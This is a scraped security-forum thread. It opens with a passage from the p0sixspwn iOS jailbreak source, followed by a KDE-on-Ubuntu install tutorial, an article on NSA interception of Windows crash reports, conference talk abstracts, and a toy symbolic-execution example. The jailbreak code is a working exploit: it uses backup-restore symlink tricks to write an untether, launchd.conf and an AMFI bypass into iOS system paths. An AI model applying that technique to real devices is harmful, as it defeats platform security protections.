             if (!connected) {
                 ERROR("Device connection failed\n");
                 return -1;
             }

             // Open a connection to our device
             DEBUG("Opening connection to device\n");
             device = device_create(uuid);
             if (device == NULL) {
                 ERROR("Unable to connect to device\n");
             }

             lockdown_t *lockdown = lockdown_open(device);
             if (lockdown == NULL) {
                 WARN("Lockdown connection failed\n");
                 device_free(device);
                 return -1;
             }
             if ((lockdown_get_string(lockdown, "HardwareModel", &product) != LOCKDOWN_E_SUCCESS)
                 || (lockdown_get_string(lockdown, "BuildVersion", &build) != LOCKDOWN_E_SUCCESS)) {
                 ERROR("Could not get device information\n");
                 if (product) {
                     free(product);
                 }
                 if (build) {
                     free(build);
                 }
                 lockdown_free(lockdown);
                 device_free(device);
                 return -1;
             }

             cb("Getting payload files from Apple... (if this fails, your internet connection has issues...)\n", 5);
             struct stat st;

             /* Hackcheck for network connection... */
             ZipInfo* info2 = PartialZipInit("http://appldnld.apple.com/iOS6.1/091-2397.20130319.EEae9/iPad2,1_6.1.3_10B329_Restore.ipsw");
             if(!info2) {
                 ERROR("Cannot make PartialZip context\n");
                 return -1;
             }
             PartialZipSetProgressCallback(info2, callback);
             CDFile* file = PartialZipFindFile(info2, "BuildManifest.plist");
             if(!file) {
                 ERROR("cannot file find\n");
                 return -1;
             }
             PartialZipRelease(info2);

             DEBUG("Device info: %s, %s\n", product, build);
             DEBUG("Beginning jailbreak, this may take a while...\n");
             cb("Gathering information to generate jailbreak data...\n", 10);

             uint16_t port = 0;
             is_ddid = 0;

             if (lockdown_start_service(lockdown, "com.apple.afc2", &port) == 0) {
                 char **fileinfo = NULL;
                 uint32_t ffmt = 0;
                 afc_client_t afc2 = NULL;
                 desc.port = port;
                 afc_client_new(device->client, &desc, &afc2);
                 if (afc2) {
                     afc_get_file_info(afc2, "/Applications", &fileinfo);
                     if (fileinfo) {
                         int i;
                         for (i = 0; fileinfo[i]; i += 2) {
                             if (!strcmp(fileinfo[i], "st_ifmt")) {
                                 if (strcmp(fileinfo[i + 1], "S_IFLNK") == 0) {
                                     ffmt = 1;
                                 }
                                 break;
                             }
                         }
                         afc_free_dictionary(fileinfo);
                         fileinfo = NULL;
                         if (ffmt) {
                             ERROR("Device already jailbroken! Detected stash.");
                             afc_client_free(afc2);
                             lockdown_free(lockdown);
                             device_free(device);
                             cb("Device already jailbroken, detected stash.", 100);
                             return 0;
                         }
                     }
                     afc_get_file_info(afc2, "/private/etc/launchd.conf", &fileinfo);
                     if (fileinfo) {
                         ERROR("Device already jailbroken! Detected untether.");
                         afc_client_free(afc2);
                         lockdown_free(lockdown);
                         device_free(device);
                         cb("Device already jailbroken, detected untether.", 100);
                         return 0;
                     }
                     afc_client_free(afc2);
                 }
             }

             if (lockdown_start_service(lockdown, "com.apple.afc", &port) != 0) {
                 ERROR("Failed to start AFC service", 0);
                 lockdown_free(lockdown);
                 device_free(device);
                 return -1;
             }
             lockdown_free(lockdown);
             lockdown = NULL;

             afc_client_t afc = NULL;
             desc.port = port;
             afc_client_new(device->client, &desc, &afc);
             if (!afc) {
                 ERROR("Could not connect to AFC service\n");
                 device_free(device);
                 return -1;
             }

             // check if directory exists
             char **list = NULL;
             if (afc_read_directory(afc, "/" AFCTMP, &list) != AFC_E_SUCCESS) {
                 // we're good, directory does not exist.
             } else {
                 free_dictionary(list);
                 WARN("Looks like you attempted to apply this Jailbreak and it failed. Will try to fix now...\n", 0);
                 sleep(5);
                 goto fix;
             }
             afc_client_free(afc);
             afc = NULL;

             /** SYMLINK: Recordings/.haxx -> /var */
             rmdir_recursive(backup_dir);
             mkdir(backup_dir, 0755);
             char *bargv[] = { "idevicebackup2", "backup", backup_dir, NULL };
             char *rargv[] = { "idevicebackup2", "restore", "--system", "--settings", "--reboot", backup_dir, NULL };
             char *rargv2[] = { "idevicebackup2", "restore", "--system", "--settings", backup_dir, NULL };
             backup_t *backup;
             rmdir_recursive(backup_dir);
             mkdir(backup_dir, 0755);
             idevicebackup2(3, bargv);
             cb("Sending initial data...\n", 15);
             backup = backup_open(backup_dir, uuid);
             if (!backup) {
                 fprintf(stderr, "ERROR: failed to open backup\n");
                 return -1;
             }

             /* Reboot for the sake of posterity. Gets rid of all Developer images mounted. */
             {
                 if (backup_mkdir(backup, "MediaDomain", "Media/Recordings", 0755, 501, 501, 4) != 0) {
                     ERROR("Could not make folder\n");
                     return -1;
                 }
                 if (backup_symlink(backup, "MediaDomain", "Media/Recordings/.haxx", "/var/db/launchd.db/com.apple.launchd", 501, 501, 4) != 0) {
                     ERROR("Failed to symlink var!\n");
                     return -1;
                 }
                 FILE *f = fopen("payload/common/overrides.plist", "wb+");
                 fwrite(overrides_plist, sizeof(overrides_plist), 1, f);
                 fclose(f);
                 if (backup_add_file_from_path(backup, "MediaDomain", "payload/common/overrides.plist", "Media/Recordings/.haxx/overrides.plist", 0100755, 0, 0, 4) != 0) {
                     ERROR("Could not add tar");
                     return -1;
                 }
             }
             idevicebackup2(6, rargv);
             unlink("payload/common/overrides.plist");
             backup_free(backup);
             cb("Waiting for reboot. Do not unplug your device.\n", 18);

             /********************************************************/
             /* wait for device reboot */
             /********************************************************/
             // wait for disconnect
             while (connected) {
                 sleep(2);
             }
             DEBUG("Device %s disconnected\n", uuid);
             // wait for device to connect
             while (!connected) {
                 sleep(2);
             }
             DEBUG("Device %s detected. Connecting...\n", uuid);
             sleep(10);

             /********************************************************/
             /* wait for device to finish booting to springboard */
             /********************************************************/
             device = device_create(uuid);
             if (!device) {
                 ERROR("ERROR: Could not connect to device. Aborting.");
                 // we can't recover since the device connection failed...
                 return -1;
             }
             lockdown = lockdown_open(device);
             if (!lockdown) {
                 device_free(device);
                 ERROR("ERROR: Could not connect to lockdown. Aborting");
                 // we can't recover since the device connection failed...
                 return -1;
             }

             retries = 100;
             int done = 0;
             sbservices_client_t sbsc = NULL;
             plist_t state = NULL;
             DEBUG("Waiting for SpringBoard...\n");
             while (!done && (retries-- > 0)) {
                 port = 0;
                 lockdown_start_service(lockdown, "com.apple.springboardservices", &port);
                 if (!port) {
                     continue;
                 }
                 sbsc = NULL;
                 desc.port = port;
                 sbservices_client_new(device->client, &desc, &sbsc);
                 if (!sbsc) {
                     continue;
                 }
                 if (sbservices_get_icon_state(sbsc, &state, "2") == SBSERVICES_E_SUCCESS) {
                     plist_free(state);
                     state = NULL;
                     done = 1;
                 }
                 sbservices_client_free(sbsc);
                 if (done) {
                     sleep(3);
                     DEBUG("bootup complete\n");
                     break;
                 }
                 sleep(3);
             }
             lockdown_free(lockdown);
             lockdown = NULL;

             /* Download images. */
             if(stat("payload/iOSUpdaterHelper.dmg", &st)) {
                 ZipInfo* info = PartialZipInit("http://appldnld.apple.com/iOS6/041-8518.20121029.CCrt9/iOSUpdater.ipa");
                 if(!info) {
                     ERROR("Cannot make PartialZip context\n");
                     return -1;
                 }
                 PartialZipSetProgressCallback(info, callback);
                 CDFile* file = PartialZipFindFile(info, "Payload/iOSUpdater.app/iOSUpdaterHelper.dmg");
                 if(!file) {
                     ERROR("Cannot find file in zip 1\n");
                     return -1;
                 }
                 unsigned char* data = PartialZipGetFile(info, file);
                 int dataLen = file->size;
                 PartialZipRelease(info);
                 data = realloc(data, dataLen + 1);
                 data[dataLen] = '\0';
                 FILE* out;
                 out = fopen("payload/iOSUpdaterHelper.dmg", "wb+");
                 if (out == NULL) {
                     ERROR("Failed to open file");
                     return -1;
                 }
                 fwrite(data, sizeof(char), dataLen, out);
                 fclose(out);
                 free(data);
             }
             if(stat("payload/iOSUpdaterHelper.dmg.signature", &st)) {
                 ZipInfo* info = PartialZipInit("http://appldnld.apple.com/iOS6/041-8518.20121029.CCrt9/iOSUpdater.ipa");
                 if(!info) {
                     ERROR("Cannot make PartialZip context\n");
                     return -1;
                 }
                 PartialZipSetProgressCallback(info, callback);
                 CDFile* file = PartialZipFindFile(info, "Payload/iOSUpdater.app/iOSUpdaterHelper.dmg.signature");
                 if(!file) {
                     ERROR("Cannot find file in zip 2\n");
                     return -1;
                 }
                 unsigned char* data = PartialZipGetFile(info, file);
                 int dataLen = file->size;
                 PartialZipRelease(info);
                 data = realloc(data, dataLen + 1);
                 data[dataLen] = '\0';
                 FILE* out;
                 out = fopen("payload/iOSUpdaterHelper.dmg.signature", "wb+");
                 if (out == NULL) {
                     ERROR("Failed to open file");
                     return -1;
                 }
                 fwrite(data, sizeof(char), dataLen, out);
                 fclose(out);
                 free(data);
             }

             /*
              * Upload DDI original.
              */
             real_dmg = "payload/iOSUpdaterHelper.dmg";
             real_dmg_signature = "payload/iOSUpdaterHelper.dmg.signature";
             ddi_dmg = "payload/hax.dmg";
             cb("Waiting for device...\n", 25);
             //dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_DEFAULT, 0), ^{
             AMDAddLogFileDescriptor(2);
             am_device_notification * notif;
             assert(!AMDeviceNotificationSubscribe(cb2, 0, 0, NULL, &notif));
             CFRunLoopRun();
             //});
             while (!is_ddid) ;
             if (is_ddid == -1) {
                 ERROR("Failed to mount image\n");
                 cb("Failed to mount image\n", 10);
                 return -1;
             }

             /** DDI Mounted! */
             if (!lockdown)
                 lockdown = lockdown_open(device);
             cb("Remounting root...\n", 40);
             if (lockdown_start_service(lockdown, "r", &port) != 0) {
                 DEBUG("Timed out on doing so... doesn't really matter though..\n");
             }

             /* Delete files */
             unlink("payload/iOSUpdaterHelper.dmg");
             unlink("payload/iOSUpdaterHelper.dmg.signature");

             /** Install bootstrap. */
             rmdir_recursive_afc(afc, "/Recordings", 1);
             if (lockdown_start_service(lockdown, "com.apple.afc2", &port) != 0) {
                 ERROR("Device failed to mount image proper!\n");
                 return -1;
             }

             /*
              * Goody, goody. Let's copy everything over!
              */
             cb("Sending Cydia and untether payload to the device...\n", 70);
             rmdir_recursive(backup_dir);
             mkdir(backup_dir, 0755);
             if (!afc) {
                 lockdown = lockdown_open(device);
                 port = 0;
                 if (lockdown_start_service(lockdown, "com.apple.afc", &port) != 0) {
                     WARN("Could not start AFC service. Aborting.\n");
                     lockdown_free(lockdown);
                     goto leave;
                 }
                 lockdown_free(lockdown);
                 desc.port = port;
                 afc_client_new(device->client, &desc, &afc);
                 if (!afc) {
                     WARN("Could not connect to AFC. Aborting.\n");
                     goto leave;
                 }
             }
             rmdir_recursive_afc(afc, "/Recordings", 1);
             idevicebackup2(3, bargv);
             backup = backup_open(backup_dir, uuid);
             if (!backup) {
                 fprintf(stderr, "ERROR: failed to open backup\n");
                 return -1;
             }

             /*
              * Do it again.
              */
             {
                 if (backup_mkdir(backup, "MediaDomain", "Media/Recordings", 0755, 501, 501, 4) != 0) {
                     ERROR("Could not make folder\n");
                     return -1;
                 }
                 if (backup_symlink(backup, "MediaDomain", "Media/Recordings/.haxx", "/", 501, 501, 4) != 0) {
                     ERROR("Failed to symlink root!\n");
                     return -1;
                 }
                 if (backup_mkdir(backup, "MediaDomain", "Media/Recordings/.haxx/var/untether", 0755, 0, 0, 4) != 0) {
                     ERROR("Could not make folder\n");
                     return -1;
                 }
                 {
                     char jb_path[128];
                     char amfi_path[128];
                     char launchd_conf_path[128];
                     snprintf(jb_path, 128, "payload/common/untether", build, product);
                     snprintf(amfi_path, 128, "payload/common/_.dylib", build, product);
                     snprintf(launchd_conf_path, 128, "payload/common/launchd.conf", build, product);
                     if (backup_add_file_from_path(backup, "MediaDomain", launchd_conf_path, "Media/Recordings/.haxx/var/untether/launchd.conf", 0100644, 0, 0, 4) != 0) {
                         ERROR("Could not add launchd.conf");
                         return -1;
                     }
                     if (backup_symlink(backup, "MediaDomain", "Media/Recordings/.haxx/private/etc/launchd.conf", "/private/var/untether/launchd.conf", 0, 0, 4) != 0) {
                         ERROR("Failed to symlink launchd.conf!\n");
                         return -1;
                     }
                     if (backup_add_file_from_path(backup, "MediaDomain", "payload/common/tar", "Media/Recordings/.haxx/var/untether/tar", 0100755, 0, 0, 4) != 0) {
                         ERROR("Could not add tar");
                         return -1;
                     }
                     if (backup_symlink(backup, "MediaDomain", "Media/Recordings/.haxx/bin/tar", "/private/var/untether/tar", 0, 0, 4) != 0) {
                         ERROR("Failed to symlink tar!\n");
                         return -1;
                     }
                     if (backup_symlink(backup, "MediaDomain", "Media/Recordings/.haxx/usr/libexec/dirhelper", "/private/var/untether/dirhelper", 0, 0, 4) != 0) {
                         ERROR("Failed to symlink dirhelper!\n");
                         return -1;
                     }
                     if (backup_add_file_from_path(backup, "MediaDomain", "payload/common/install.deb", "Media/Recordings/.haxx/var/untether/install.deb", 0100755, 0, 0, 4) != 0) {
                         ERROR("Could not add dirhelper");
                         return -1;
                     }
                     if (backup_add_file_from_path(backup, "MediaDomain", "payload/common/dirhelper", "Media/Recordings/.haxx/var/untether/dirhelper", 0100755, 0, 0, 4) != 0) {
                         ERROR("Could not add dirhelper");
                         return -1;
                     }
                     if (backup_add_file_from_path(backup, "MediaDomain", jb_path, "Media/Recordings/.haxx/var/untether/untether", 0100755, 0, 0, 4) != 0) {
                         ERROR("Could not add jb");
                         return -1;
                     }
                     if (backup_add_file_from_path(backup, "MediaDomain", amfi_path, "Media/Recordings/.haxx/var/untether/_.dylib", 0100644, 0, 0, 4) != 0) {
                         ERROR("Could not add amfi");
                         return -1;
                     }
                     if (backup_add_file_from_path(backup, "MediaDomain", "payload/Cydia.tar", "Media/Recordings/.haxx/var/untether/Cydia.tar", 0100644, 0, 0, 4) != 0) {
                         ERROR("Could not add cydia");
                         return -1;
                     }
                 }
             }
             idevicebackup2(5, rargv2);
             backup_free(backup);
             cb("Finalizing...\n", 90);
             DEBUG("Installed jailbreak, fixing up directories.\n");
             rmdir_recursive_afc(afc, "/Recordings", 1);

             /********************************************************/
             /*
              * move back any remaining dirs via AFC
              */
             /********************************************************/
             is_jailbroken = 1;

         fix:
             DEBUG("Recovering files...\n", 80);
             if (!afc) {
                 lockdown = lockdown_open(device);
                 port = 0;
                 if (lockdown_start_service(lockdown, "com.apple.afc", &port) != 0) {
                     WARN("Could not start AFC service. Aborting.\n");
                     lockdown_free(lockdown);
                     goto leave;
                 }
                 lockdown_free(lockdown);
                 lockdown = NULL;
                 desc.port = port;
                 afc_client_new(device->client, &desc, &afc);
                 if (!afc) {
                     WARN("Could not connect to AFC. Aborting.\n");
                     goto leave;
                 }
             }
             rmdir_recursive(backup_dir);
             WARN("Recovery complete.\n");

             if (is_jailbroken) {
                 cb("Your device is now jailbroken, it is now preparing to reboot automatically.\n", 100);
                 WARN("Your device is now jailbroken, it is now preparing to reboot automatically.\n");
                 /*
                  * Reboot device automatically.
*/ lockdown = lockdown_open(device); diagnostics_relay_client_t diagnostics_client = NULL; uint16_t diag_port = 0; lockdown_start_service(lockdown, "com.apple.mobile.diagnostics_relay", &diag_port); desc.port = diag_port; if (diagnostics_relay_client_new(device->client, &desc, &diagnostics_client) == DIAGNOSTICS_RELAY_E_SUCCESS) { diagnostics_relay_restart(diagnostics_client, 0); } } else { cb("Your device has encountered an error during the jailbreak process, unplug it and try again.\n", 100); WARN("Your device has encountered an error during the jailbreak process, unplug it and try again.\n"); } leave: afc_client_free(afc); afc = NULL; device_free(device); device = NULL; return 0; } Sursa completa: https://github.com/p0sixspwn/p0sixspwn
  8. [h=1]How to Install KDE SC 4.12 on Ubuntu 13.10 and 12.04 LTS[/h]

December 31st, 2013, 04:40 GMT · By Marius Nestor

The following tutorial will teach both existing and new Kubuntu/Ubuntu users how to install or upgrade the brand-new and featureful KDE SC 4.12 desktop environment on their existing and healthy Ubuntu/Kubuntu 13.10 (Saucy Salamander) and 12.04 LTS (Precise Pangolin) operating systems.

After yet another six months of hard work, the beautiful KDE Software Compilation reached version 4.12 on December 18, 2013, bringing improvements to its main components: KDE Plasma Workspaces, KDE Applications and KDE Platform.

As expected, the Kubuntu developers packaged the new version of the KDE Software Compilation for the Kubuntu 13.10 and 12.04 LTS releases via an easy-to-use PPA. However, the packages also work well on other Ubuntu 13.10 and 12.04 LTS based Linux operating systems, so the following guide will teach you how to install KDE SC 4.12 on top of your existing Ubuntu installation.

Step 1 – Add KDE SC 4.12 repositories

Open a Terminal window by hitting the CTRL+ALT+T key combination on your keyboard. Copy and paste the following command in the Terminal window:

sudo add-apt-repository ppa:kubuntu-ppa/backports

Hit Enter, type your password when asked, and hit Enter again. See the next screenshot for details, but do not close the Terminal window yet. Proceed to the next step!

Adding the KDE SC 4.12 PPA in Ubuntu 13.10

Now you need to update the package database on your system so that it picks up the newly added PPA packages with the KDE SC 4.12 release. Copy and paste the following command:

sudo apt-get update

Hit Enter and wait for it to index the new packages.

When it's done, execute the following command (copy and paste) to install KDE SC 4.12 or update your existing KDE installation to the 4.12 version:

sudo apt-get install kubuntu-desktop

Once again, hit the Enter key when asked if you want to install all the KDE SC 4.12 packages, and wait for them to be downloaded and installed, a process that will take some time, depending on your network connection and computer specs.

Installing KDE SC 4.12 in Ubuntu 13.10

When all the KDE SC 4.12 packages have been installed, close the Terminal window and reboot your computer. Immediately after the boot screen, Ubuntu users will notice that the boot splash screen has been replaced with the Kubuntu one, as has the login screen. At the login screen, select your username, click the button that says "Ubuntu" and select the KDE Plasma Workspace entry. See the screenshot below for details.

The login screen of Kubuntu 13.10

Type your password and hit Enter to log in. After a few seconds, the KDE SC 4.12 desktop environment will be loaded... Enjoy!

KDE SC 4.12 on Ubuntu 13.10

Uninstalling KDE SC 4.12 (optional step)

In case you don't like KDE SC 4.12 and you want to remove it from your system and return to your previous desktop environment, open a Terminal window with the CTRL+ALT+T key combination, access this link and copy/paste that huge command in the Terminal window, hit Enter to execute it and again when asked if you want to remove the packages. After that, type the following commands to remove the rest of the KDE packages from your system (one by one, hitting Enter after each one):

sudo apt-get autoremove
sudo apt-get install ppa-purge
sudo ppa-purge ppa:kubuntu-ppa/backports
sudo apt-get update
sudo apt-get dist-upgrade
sudo gedit /etc/lightdm/lightdm.conf

Now replace "kde-plasma" with "ubuntu" under the 'user-session=' entry, and "lightdm-kde-greeter" with "unity-greeter" under the 'greeter-session=' entry. Save the file and close it.

Reboot your computer and everything should be like it was before installing KDE. Do not hesitate to use our commenting system below in case you encounter any issues with the tutorial.

Source: How to Install KDE SC 4.12 on Ubuntu 13.10 and 12.04 LTS
  9. Why the NSA is happy when Windows crashes

The latest Snowden leaks via Der Spiegel contain an interesting snippet: the NSA intercepts Windows crash reports en route from the user to Microsoft. “An internal presentation suggests it is NSA’s powerful XKeyscore spying tool that is used to fish these crash reports out of the massive sea of Internet traffic.” The NSA presentation even makes a joke of it, adapting the Microsoft error message to say, “This information may be intercepted by a foreign SIGINT system…” Frankly, I find the NSA sense of humour troubling rather than amusing.

These error messages, says Spiegel, provide “valuable insights into problems with a targeted person’s computer and, thus, information on security holes that might be exploitable for planting malware or spyware on the unwitting victim’s computer.”

Really? Yes, really. Websense coincidentally (?) published a report on this very problem yesterday, and will be presenting further findings at RSA 2014 in San Francisco (assuming anybody is still going). It says,

One troubling thing we observed is Windows Error Reporting (a.k.a. Dr. Watson) predominantly sends out its crash logs in the clear. These error logs could ultimately allow eavesdroppers to map out vulnerable endpoints and gain a foothold within the network for more advanced penetration.

Here’s more on why that’s a concern:

- 80 percent of all network connected PCs use it – that’s more than one billion endpoints worldwide
- Dr. Watson reports information that hackers commonly use to find and exploit weak systems, such as OS, service pack and update versions
- Crashes are especially useful for attackers as they may pinpoint a new exploitable code flaw for a zero-day attack
- Information is also sent for common system events like plugging in a USB device

Let’s see how long it takes for Microsoft to respond and start encrypting its error messages. Then the only problem will be in persuading us that it hasn’t simultaneously given NSA the key…

Source: Why the NSA is happy when Windows crashes | Kevin Townsend
  10. Defcon 21 - Hacking Driverless Vehicles

Description: Are driverless vehicles ripe for the hacking? Autonomous and unmanned systems are already patrolling our skies and oceans and being tested on our streets and highways. All trends indicate these systems are at an inflection point that will show them rapidly becoming commonplace. It is therefore a salient time for a discussion of the capabilities and potential vulnerabilities of these systems. This session will be an informative and light-hearted look at the current state of civil driverless vehicles and what hackers or miscreants might do to mess with them. Topics covered will include common sensors, decision profiles and their potential failure modes that could be exploited. With this talk Zoz aims both to inspire unmanned vehicle fans to think about robustness to adversarial and malicious scenarios, and to give the paranoid false hope of resisting the robot revolution. He will also present details of how students can get involved in the ultimate sports events for robot hacking, the autonomous vehicle competitions.

Zoz is a robotics interface designer and rapid prototyping specialist. He is a co-founder of Cannytrophic Design in Boston and CTO of BlueSky in San Francisco. As co-host of the Discovery Channel show 'Prototype This!' he pioneered urban pizza delivery with robotic vehicles, including the first autonomous crossing of an active highway bridge in the USA, and airborne delivery of life preservers at sea from an autonomous aircraft. He also hosts the annual AUVSI Foundation student autonomous robot competitions such as Roboboat and Robosub.

For more information please visit: https://www.defcon.org/html/defcon-21/dc-21-speakers.html

Source: Defcon 21 - Hacking Driverless Vehicles
  11. [h=1]Triggering Deep Vulnerabilities Using Symbolic Execution [30c3][/h]

Triggering Deep Vulnerabilities Using Symbolic Execution

Deep program analysis without the headache

Symbolic Execution (SE) is a powerful way to analyze programs. Instead of using concrete data values, SE uses symbolic values to evaluate a large set of parallel program paths at once. A drawback of many systems is that they need source code access and only scale to a few lines of code. This talk explains how SE and binary analysis can be used to (i) reverse-engineer components of binary-only applications and (ii) construct specific concrete input that triggers a given condition deep inside the application (think of defining an error condition and letting the SE engine construct the input to the application that triggers the error).

Analysis and reverse engineering of binary programs is cumbersome. Consider the problem that we have a given interesting (error) condition inside the program that we want to trigger. How can we generate a specific input to the program that, during the execution of the program, will trigger the condition? In this talk we use a combination of binary analysis techniques that recover high-level control-flow and data-flow information from a binary-only application and Symbolic Execution (SE) to automate the analysis of such problems.

Existing SE tools have often been used to achieve high coverage across all code paths in an application to find implementation bugs. We use SE for a different purpose: given a vulnerability condition hidden deep inside the application, what is the input that triggers that condition?

We tackle the given problem in three major steps: (i) gathering information about the binary, (ii) analyzing the information-flow and control-flow of the binary, and (iii) using symbolic execution to generate a specific input example that triggers the specified condition. During the information gathering process we define the interesting condition and use regular analysis techniques to set up later stages. In the information-flow and control-flow analysis we use a given sample input to collect a complete execution trace of the application, which is then parsed into a graph that dissects the computation of the application into individual components. The last step uses FuzzBALL, our open-source SE engine, to compute specific vulnerability-triggering inputs for the identified components.

To evaluate our technique we will show several examples using real programs, showing how we can use specific vulnerability conditions to automatically generate input that triggers this condition. In addition, we will show how our SE engine can be used for other interesting analyses on binary-only applications. Our tools are available as open-source and we invite other hackers to join in on this project.

Speaker: gannimo
EventID: 5224
Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC]
Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany
Language: English
Begin: Fri, 12/27/2013
License: CC-by
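As an added illustration of the approach the abstract describes (my example, not FuzzBALL or the speakers' code), here is a miniature symbolic executor in Python: it runs a constructed toy program on symbolic inputs, records the constraint at every branch it forks at, and then solves the constraints of the path that ends in the chosen "bug" condition. An exhaustive search over a small input domain stands in for the SMT solver a real engine would use.

```python
"""Mini symbolic executor (added example, not FuzzBALL): fork at every branch
on a symbolic value, collect path constraints, solve for a concrete input that
reaches a chosen condition deep inside the program."""
from itertools import product


class Sym:
    """A symbolic value: an expression tree over the program's inputs."""

    def __init__(self, expr):
        self.expr = expr  # ("in", name) | ("lit", n) | (op, lhs, rhs)

    @staticmethod
    def lift(v):
        return v if isinstance(v, Sym) else Sym(("lit", v))

    def __add__(self, o): return Sym(("add", self.expr, Sym.lift(o).expr))
    def __radd__(self, o): return Sym.lift(o) + self
    def __mul__(self, o): return Sym(("mul", self.expr, Sym.lift(o).expr))
    def __eq__(self, o): return Sym(("eq", self.expr, Sym.lift(o).expr))
    def __lt__(self, o): return Sym(("lt", self.expr, Sym.lift(o).expr))
    __hash__ = None

    def __bool__(self):
        # Every `if` on a symbolic value is a fork: the engine chooses the
        # outcome and records the constraint that choice imposes on the inputs.
        return ENGINE.decide(self.expr)


class Engine:
    def __init__(self):
        self.schedule = []  # branch outcomes to replay on this run
        self.trace = []     # (condition, outcome) pairs seen on this run

    def decide(self, cond):
        i = len(self.trace)
        outcome = self.schedule[i] if i < len(self.schedule) else True
        self.trace.append((cond, outcome))
        return outcome


ENGINE = Engine()


def evaluate(expr, env):
    """Concretely evaluate an expression tree under an input assignment."""
    tag = expr[0]
    if tag == "in":
        return env[expr[1]]
    if tag == "lit":
        return expr[1]
    lhs, rhs = evaluate(expr[1], env), evaluate(expr[2], env)
    if tag == "add": return lhs + rhs
    if tag == "mul": return lhs * rhs
    if tag == "eq": return lhs == rhs
    if tag == "lt": return lhs < rhs
    raise ValueError(tag)


def explore(program, names):
    """Run `program` once per distinct branch schedule (generational search);
    return a list of (path_constraints, result)."""
    paths, worklist, seen = [], [[]], {()}
    while worklist:
        sched = worklist.pop()
        ENGINE.schedule, ENGINE.trace = sched, []
        result = program(*[Sym(("in", n)) for n in names])
        trace = list(ENGINE.trace)
        paths.append((trace, result))
        outcomes = [o for _, o in trace]
        # Fork only at decisions the schedule did not already fix; earlier
        # positions were flipped when their ancestor schedule was explored.
        for i in range(len(sched), len(trace)):
            child = outcomes[:i] + [not outcomes[i]]
            if tuple(child) not in seen:
                seen.add(tuple(child))
                worklist.append(child)
    return paths


def solve(constraints, names, domain=range(64)):
    """Stand-in for an SMT solver: exhaustive search over a small domain for an
    assignment under which every recorded (condition, outcome) pair holds."""
    for values in product(domain, repeat=len(names)):
        env = dict(zip(names, values))
        if all(evaluate(c, env) == o for c, o in constraints):
            return env
    return None


def find_input(program, names, target):
    """Return a concrete input whose execution path ends in `target`."""
    for constraints, result in explore(program, names):
        if result == target:
            env = solve(constraints, names)
            if env is not None:
                return env
    return None


def parse_record(x, y):
    """Constructed target program: the 'bug' hides behind two data-dependent
    checks, so random inputs almost never reach it."""
    a = x + 3
    if a == 42:
        b = y * 2
        if b == x + 1:
            return "BUG"  # the deep condition we want to trigger
        return "partial"
    return "ok"


if __name__ == "__main__":
    print(find_input(parse_record, ["x", "y"], "BUG"))  # {'x': 39, 'y': 20}
```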
  12. [h=1]Reverse engineering of CHIASMUS from GSTOOL [30c3][/h]

Reverse engineering of CHIASMUS from GSTOOL

It hurts.

We reverse-engineered one implementation of the non-public CHIASMUS cipher designed by the German Federal Office for Information Security (Bundesamt für Sicherheit in der Informationstechnik, short BSI). This not only gave us some insight into the cipher, but also uncovered serious implementation issues in GSTOOL which allow attackers to crack files encrypted with the GSTOOL encryption function with very little effort.

In the dark ages of digital cryptography, when ciphers were considered export-controlled munitions and AES was not yet standardized, the German Federal Office for Information Security (Bundesamt für Sicherheit in der Informationstechnik, short BSI) decided to invent their own ciphers: CHIASMUS for software implementations and LIBELLE, which would be kept secret and only implemented in hardware.

CHIASMUS is not publicly documented. It is implemented in a software tool of the same name, released by the BSI, which is only available where there is a public interest for its use. However, the GSTOOL, a database application for security audit management also released by the BSI, contains an encryption feature using the CHIASMUS block cipher, and is freely available. This software was developed by a third party, Steria Mummert Consulting, and apparently was not properly reviewed.

We disassembled and analyzed the GSTOOL to obtain the specification for the encrypted files (and thus the CHIASMUS cipher itself), but we got more than we bargained for. While the cipher itself appears to be pretty secure, the implementation is a collection of rookie mistakes and a great example of what can (and will) go wrong if you ask people with little understanding of cryptography to build cryptographic software and don't verify their results.

We invite you to enjoy this thriller full of historic backgrounds, non-public public announcements, legal threats, weapons-grade stupidity, and a very simple solution for complex cryptographic problems. Facepalm with us on the two-year long hunt for the elusive security patch! Have a look at the (not-so-secret-anymore) CHIASMUS block cipher! Learn why you should not build your own crypto tools unless you really know what you are doing, even if you use a known algorithm. And what happens when government contractors attempt to do so. And then attempt to fix it.

(Note: Since this is an implementation issue, the stand-alone Chiasmus software tool is not affected by this issue.)

Speaker: Jan Schejbal
EventID: 5307
Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC]
Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany
Language: English
Begin: Fri, 12/27/2013
License: CC-by
  13. [h=1]10 Years of Fun with Embedded Devices [30c3][/h]

10 Years of Fun with Embedded Devices

How OpenWrt evolved from a WRT54G firmware to a universal Embedded Linux OS

A review of the 10 year history of the OpenWrt project, current events, and upcoming developments.

This year we are celebrating ten years of OpenWrt. A long time has passed and a lot has happened since people first started hacking on devices like the WRT54G. Both the hardware and the software landscape have completely changed since then. In this talk we would like to take the chance, together with the audience, to look back on how the OpenWrt distribution evolved over time and how it has changed its goals, its processes and its software stack. We will show examples of the current state of the art, invite guests on stage, and display things to come. And in general, celebrate that 10 years have passed and that many more are to come.

The talk will start by looking back into the ancient history of OpenWrt (how it all got started), continue to the present time and give an overview of current and recent developments, and then finish with an outlook onto future changes. During the talk we will look at the politics of what we have learned, what we think is broken in the CPE market, and how OpenWrt can help to change this.

OpenWrt has, over the course of the past 10 years, created a territory of its own, a territory situated in a landscape crisscrossed by relations, friction and interconnections. It is a journey that on its way created a universal embedded Linux operating system. OpenWrt is one of many islands in the Net which thrives by giving away its work to friends, associates and all those many people we don't know. All this is a good reason to celebrate, and the talk will finish with beer, exotic drinks and more fun to come.

Speaker: nbd
EventID: 5497
Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC]
Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany
Language: English
Begin: Fri, 12/27/2013
License: CC-by
  14. [h=1]An introduction to Firmware Analysis [30c3][/h]

An introduction to Firmware Analysis

Techniques - Tools - Tricks

This talk gives an introduction to firmware analysis. It starts with how to retrieve the binary, e.g. get a plain file from the manufacturer, extract it from an executable or memory device, or even sniff it out of an update process or internal CPU memory, which can be really tricky. After that it introduces the necessary tools, gives tips on how to detect the processor architecture, and explains some more advanced analysis techniques, including how to figure out the offsets where the firmware is loaded to, and how to start the investigation.

